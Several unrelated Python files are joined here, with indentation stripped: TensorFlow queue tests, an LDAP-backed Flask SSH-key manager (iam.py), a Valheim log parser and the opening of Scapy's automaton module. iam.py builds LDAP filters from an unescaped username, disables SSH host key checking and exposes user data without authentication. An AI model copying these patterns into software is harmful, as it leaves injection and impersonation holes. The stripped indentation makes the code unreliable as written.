dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
self.evaluate(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
# elements, and is blocked waiting for one more element to be dequeue.
for i in range(50):
queue_size = self.evaluate(size_t)
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
def testResetOfBlockingOperation(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
self.evaluate(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(self.evaluate(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
self.evaluate(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|
iam.py
|
#!/usr/bin/env python3
import threading
import ldap
import os
import sqlite3
import threading
import queue
import atexit
import subprocess
import multiprocessing
import json
from datetime import datetime
from io import StringIO
from flask import Flask, request, redirect, url_for, flash, render_template, abort, Response, g, make_response
from pprint import pprint
from gevent.wsgi import WSGIServer
import settings
copy_queue = queue.Queue()
copy_log = []
def copy(args):
host, text = args
cmd = ['ssh', '-i', settings.IDENTITY_FILE, '-o', 'StrictHostKeyChecking no', 'iam@' + host]
process = subprocess.Popen(cmd, universal_newlines=True, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
out, err = process.communicate(text, timeout=10)
except subprocess.TimeoutExpired:
process.kill()
out, err = process.communicate()
return host, out, err
def now():
return '[' + datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f') + ']'
def thread_copy_ssh_key():
global copy_log
print('thread_copy_ssh_key started')
conn = sqlite3.connect(settings.DB_NAME)
conn.row_factory = sqlite3.Row
while True:
initiator = copy_queue.get()
print('thread_copy_ssh_key: got task', initiator)
if initiator == 'EXIT':
return
copy_log = [now() + 'task started by ' + str(initiator)]
cur = conn.cursor()
cur.execute('SELECT username, keys FROM keys')
keys = {row['username']: row['keys'] for row in cur.fetchall()}
users = list(keys.keys()) if initiator is None else [initiator]
for username in keys:
name = ldap_get_display_name(username)
cur.execute('UPDATE users SET name=? WHERE username=?', (name, username))
conn.commit()
cur.close()
msg = dict(user_keys=keys, users=users)
text = json.dumps(msg, indent=2)
tasks = [(s, text) for s in settings.SERVERS.values()]
pool = multiprocessing.Pool(processes=max(len(settings.SERVERS), 1))
for host, out, err in pool.imap(copy, tasks):
copy_log.append(now() + host)
out_lines = out.splitlines()
out_lines = out_lines[out_lines.index('====== START IAM SHELL ======')+1:]
copy_log.extend(out_lines)
copy_log.append('-'*30)
pool.terminate()
pool.join()
copy_log.append(now() + 'done')
app = Flask(__name__)
def get_db():
db = getattr(g, '_database', None)
if db is None:
conn = sqlite3.connect(settings.DB_NAME)
conn.executescript('''
CREATE TABLE IF NOT EXISTS users (
username TEXT UNIQUE,
name TEXT,
port INTEGER,
subuid INTEGER
);
CREATE TABLE IF NOT EXISTS keys (
username TEXT UNIQUE,
keys TEXT
);
''')
conn.row_factory = sqlite3.Row
db = g._database = conn
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
def ldap_get_display_name(username):
ldap_url = 'ldap://{}/{}'.format(settings.LDAP_HOST, settings.LDAP_DOMAIN)
l = ldap.initialize(ldap_url)
l.simple_bind_s(settings.LDAP_IAM_USER, settings.LDAP_IAM_PASS)
base = ','.join(['cn=users'] + settings.LDAP_BASE)
res = l.search_s(base, ldap.SCOPE_SUBTREE, 'sAMAccountName=' + username, ['displayName'])
name = ''
if res:
cn, d = res[0]
names = d.get('displayName', [])
name = names[0] if names else ''
return str(name, 'utf-8')
def ldap_username_check(username):
ldap_url = 'ldap://{}/{}'.format(settings.LDAP_HOST, settings.LDAP_DOMAIN)
l = ldap.initialize(ldap_url)
l.simple_bind_s(settings.LDAP_IAM_USER, settings.LDAP_IAM_PASS)
base = ','.join(['cn=users'] + settings.LDAP_BASE)
u = l.search_s(base, ldap.SCOPE_SUBTREE, 'sAMAccountName=' + username, ['sAMAccountName'])
return len(u) > 0
def ldap_login_check(username, password):
ldap_url = 'ldap://{}/{}'.format(settings.LDAP_HOST, settings.LDAP_DOMAIN)
l = ldap.initialize(ldap_url)
try:
l.simple_bind_s(username + '@' + settings.LDAP_DOMAIN, password)
return True
except:
return False
def get_user(username):
cur = get_db().cursor()
cur.execute('SELECT name, port, subuid FROM users WHERE username=?', (username, ))
row = cur.fetchone()
if row:
return row['name'], row['port'], row['subuid']
return None, None, None
def ensure_user(username):
name, port, subuid = get_user(username)
if not port:
cur = get_db().cursor()
cur.execute('SELECT MAX(port) AS max_port, MAX(subuid) AS max_subuid FROM users')
row = cur.fetchone()
port = max(settings.MIN_PORT, row['max_port']) + 1
subuid = max(settings.MIN_SUBUID, row['max_subuid']) + 65536
name = ldap_get_display_name(username)
cur.execute('INSERT INTO users (username, name, port, subuid) VALUES (?, ?, ?, ?)', (username, name, port, subuid))
get_db().commit()
return name, port, subuid
@app.route('/user/<username>/name')
def get_name(username):
name, port, subuid = get_user(username)
if port:
response = make_response(str(name))
response.headers["content-type"] = "text/plain"
return response
else:
abort(404)
@app.route('/user/<username>/port')
def get_port(username):
name, port, subuid = get_user(username)
if port:
response = make_response(str(port))
response.headers["content-type"] = "text/plain"
return response
else:
abort(404)
@app.route('/user/<username>/subuid')
def get_subuid(username):
name, port, subuid = get_user(username)
if port:
response = make_response(str(subuid))
response.headers["content-type"] = "text/plain"
return response
else:
abort(404)
@app.route('/user/<username>/.ssh/authorized_keys')
def get_ssh_key(username):
name, port, subuid = get_user(username)
if port:
cur = get_db().cursor()
cur.execute('SELECT keys FROM keys WHERE username=?', (username,))
row = cur.fetchone()
keys = row['keys'] if row else ''
response = make_response(keys)
response.headers["content-type"] = "text/plain"
return response
else:
abort(404)
@app.route('/user/<username>/.ssh/config')
def get_ssh_config(username):
sio = StringIO()
for name, host in settings.SERVERS.items():
sio.write('Host {}-manage\n'.format(name))
sio.write(' HostName {}\n'.format(host))
sio.write(' User {}\n'.format(username))
cur = get_db().cursor()
cur.execute('SELECT port FROM users WHERE username=?', (username,))
row = cur.fetchone()
if row:
for name, host in settings.SERVERS.items():
sio.write('Host {}\n'.format(name))
sio.write(' HostName {}\n'.format(host))
sio.write(' User {}\n'.format(username))
sio.write(' Port {}\n'.format(row['port']))
response = make_response(sio.getvalue())
response.headers["content-type"] = "text/plain"
return response
@app.route('/users')
def get_users_list():
sio = StringIO()
cur = get_db().cursor()
cur.execute('SELECT * FROM users')
users = cur.fetchall()
for u in users:
sio.write('{},{},{},{}\n'.format(u['username'], u['name'], u['port'], u['subuid']))
response = make_response(sio.getvalue())
response.headers["content-type"] = "text/plain"
return response
@app.route('/manage/ssh-key', methods=['POST'])
def get_manage_ssh_key_redirect():
username = request.form['username']
return redirect(url_for('get_manage_ssh_key', username=username))
@app.route('/manage/ssh-key/<username>')
def get_manage_ssh_key(username):
if ldap_username_check(username):
ensure_user(username)
else:
abort(404)
cur = get_db().cursor()
cur.execute('SELECT keys FROM keys WHERE username=?', (username,))
row = cur.fetchone()
keys = row['keys'] if row else ''
return render_template('manage_ssh_key.html', username=username, keys=keys)
@app.route('/manage/ssh-key/<username>', methods=['POST'])
def post_manage_ssh_key(username):
password = request.form['password']
keys = request.form['keys']
if not ldap_login_check(username, password):
abort(401)
cur = get_db().cursor()
cur.execute('DELETE FROM keys WHERE username=?', (username,))
cur.execute('INSERT INTO keys (username, keys) VALUES (?, ?)', (username, keys))
get_db().commit()
copy_queue.put(username)
return redirect(url_for('get_copy_ssh_key_log'))
@app.route('/manage/send-all-keys', methods=['POST'])
def post_send_all_keys():
username = request.form['username']
password = request.form['password']
if not ldap_login_check(username, password):
abort(401)
copy_queue.put(None)
return redirect(url_for('get_copy_ssh_key_log'))
@app.route('/log/push-keys')
def get_copy_ssh_key_log():
text = '\n'.join(copy_log) + '\n'
response = make_response(text)
response.headers["content-type"] = "text/plain"
if text.strip() and 'done' not in text:
response.headers["Refresh"] = '1; url=' + url_for('get_copy_ssh_key_log')
return response
@app.route('/')
def get_homepage():
cur = get_db().cursor()
cur.execute('SELECT * FROM users')
users = cur.fetchall()
return render_template('homepage.html', users=users)
if __name__ == '__main__':
thread = threading.Thread(target=thread_copy_ssh_key)
thread.daemon = True
thread.start()
def stop_thread():
print('stopping thread')
copy_queue.put('EXIT')
thread.join()
print('thread stopped')
atexit.register(stop_thread)
http_server = WSGIServer(('', settings.WEB_PORT), app)
try:
print('WSGIServer start')
http_server.serve_forever()
except KeyboardInterrupt:
print('WSGIServer stopped')
|
parse-log.py
|
#!/usr/bin/env python3
import re
import subprocess
import sys
import threading
from datetime import datetime, timezone
from queue import Queue
# Required due to Python's standard library lacking any canonical way to refer to timezones directly besides UTC
import pytz
"""
Parse out player login/logout and death/respawn from valheim server logs into something more human-readable
Uses tail -F to track log output, e.g. put this in a tmux session or something
./parse-log.py LOG_FILE
"""
# ZDOID => PlayerName
players = dict()
# PlayerName => boolean: is dead?
death_states = dict()
tailq = Queue(maxsize=10)
def tail():
# TODO: Default to vhserver location
logtail = subprocess.Popen(['tail', '-F', '-n', '+250', sys.argv[1]],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
while True:
line: str = logtail.stdout.readline().decode('utf8')
tailq.put(line)
if not line:
break
def convert_timezone(valheim_date_string: str):
return datetime.strptime(valheim_date_string, '%m/%d/%Y %H:%M:%S').replace(tzinfo=timezone.utc).astimezone(pytz.timezone('America/Denver'))
threading.Thread(target=tail).start()
while True:
line: str = tailq.get()
matcher = re.match(r'(?P<timestamp>.*?): Got character ZDOID from (?P<name>[\w ]+) : (?P<zdoid>-?\d+)', line)
if matcher is not None:
m = matcher.groupdict()
if m['zdoid'] == '0':
print(f"{convert_timezone(m['timestamp'])}: {m['name']} has died!")
death_states[m['name']] = True
else:
if death_states.get(m['name'], False):
print(f"{convert_timezone(m['timestamp'])}: {m['name']} respawned")
death_states[m['name']] = False
else:
print(f"{convert_timezone(m['timestamp'])}: {m['name']} LOGIN")
players[m['zdoid']] = m['name']
else:
matcher = re.match(r'(?P<timestamp>.*?): Destroying abandoned non persistent zdo (?P<zdoid>-?\d+)', line)
if matcher is not None:
m = matcher.groupdict()
if m['zdoid'] in players and players[m['zdoid']] is not None:
print(f"{convert_timezone(m['timestamp'])}: {players[m['zdoid']]} LOG OUT")
players[m['zdoid']] = None
|
automaton.py
|
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# Copyright (C) Gabriel Potter <gabriel@potter.fr>
# This program is published under a GPLv2 license
"""
Automata with states, transitions and actions.
"""
from __future__ import absolute_import
import types
import itertools
import time
import os
import sys
import traceback
from select import select
from collections import deque
import threading
from scapy.config import conf
from scapy.utils import do_graph
from scapy.error import log_interactive, warning
from scapy.plist import PacketList
from scapy.data import MTU
from scapy.supersocket import SuperSocket
from scapy.consts import WINDOWS
import scapy.modules.six as six
if WINDOWS:
from scapy.error import Scapy_Exception
recv_error = Scapy_Exception
else:
recv_error = ()
""" In Windows, select.select is not available for custom objects. Here's the implementation of scapy to re-create this functionality # noqa: E501
# Passive way: using no-ressources locks
+---------+ +---------------+ +-------------------------+ # noqa: E501
| Start +------------->Select_objects +----->+Linux: call select.select| # noqa: E501
+---------+ |(select.select)| +-------------------------+ # noqa: E501
+-------+-------+
|
+----v----+ +--------+
| Windows | |Time Out+----------------------------------+ # noqa: E501
+----+----+ +----+---+ | # noqa: E501
| ^ | # noqa: E501
Event | | | # noqa: E501
+ | | | # noqa: E501
| +-------v-------+ | | # noqa: E501
| +------+Selectable Sel.+-----+-----------------+-----------+ | # noqa: E501
| | +-------+-------+ | | | v +-----v-----+ # noqa: E501
+-------v----------+ | | | | | Passive lock<-----+release_all<------+ # noqa: E501
|Data added to list| +----v-----+ +-----v-----+ +----v-----+ v v + +-----------+ | # noqa: E501
+--------+---------+ |Selectable| |Selectable | |Selectable| ............ | | # noqa: E501
| +----+-----+ +-----------+ +----------+ | | # noqa: E501
| v | | # noqa: E501
v +----+------+ +------------------+ +-------------v-------------------+ | # noqa: E501
+-----+------+ |wait_return+-->+ check_recv: | | | | # noqa: E501
|call_release| +----+------+ |If data is in list| | END state: selectable returned | +---+--------+ # noqa: E501
+-----+-------- v +-------+----------+ | | | exit door | # noqa: E501
| else | +---------------------------------+ +---+--------+ # noqa: E501
| + | | # noqa: E501
| +----v-------+ | | # noqa: E501
+--------->free -->Passive lock| | | # noqa: E501
+----+-------+ | | # noqa: E501
| | | # noqa: E501
| v | # noqa: E501
+------------------Selectable-Selector-is-advertised-that-the-selectable-is-readable---------+
"""
class SelectableObject(object):
"""DEV: to implement one of those, you need to add 2 things to your object:
- add "check_recv" function
- call "self.call_release" once you are ready to be read
You can set the __selectable_force_select__ to True in the class, if you want to # noqa: E501
force the handler to use fileno(). This may only be usable on sockets created using # noqa: E501
the builtin socket API."""
__selectable_force_select__ = False
def __init__(self):
self.hooks = []
def check_recv(self):
"""DEV: will be called only once (at beginning) to check if the object is ready.""" # noqa: E501
raise OSError("This method must be overwritten.")
def _wait_non_ressources(self, callback):
"""This get started as a thread, and waits for the data lock to be freed then advertise itself to the SelectableSelector using the callback""" # noqa: E501
self.trigger = threading.Lock()
self.was_ended = False
self.trigger.acquire()
self.trigger.acquire()
if not self.was_ended:
callback(self)
def wait_return(self, callback):
"""Entry point of SelectableObject: register the callback"""
if self.check_recv():
return callback(self)
_t = threading.Thread(target=self._wait_non_ressources, args=(callback,)) # noqa: E501
_t.setDaemon(True)
_t.start()
def register_hook(self, hook):
"""DEV: When call_release() will be called, the hook will also"""
self.hooks.append(hook)
def call_release(self, arborted=False):
"""DEV: Must be call when the object becomes ready to read.
Relesases the lock of _wait_non_ressources"""
self.was_ended = arborted
try:
self.trigger.release()
except (threading.ThreadError, AttributeError):
pass
# Trigger hooks
for hook in self.hooks:
hook()
class SelectableSelector(object):
"""
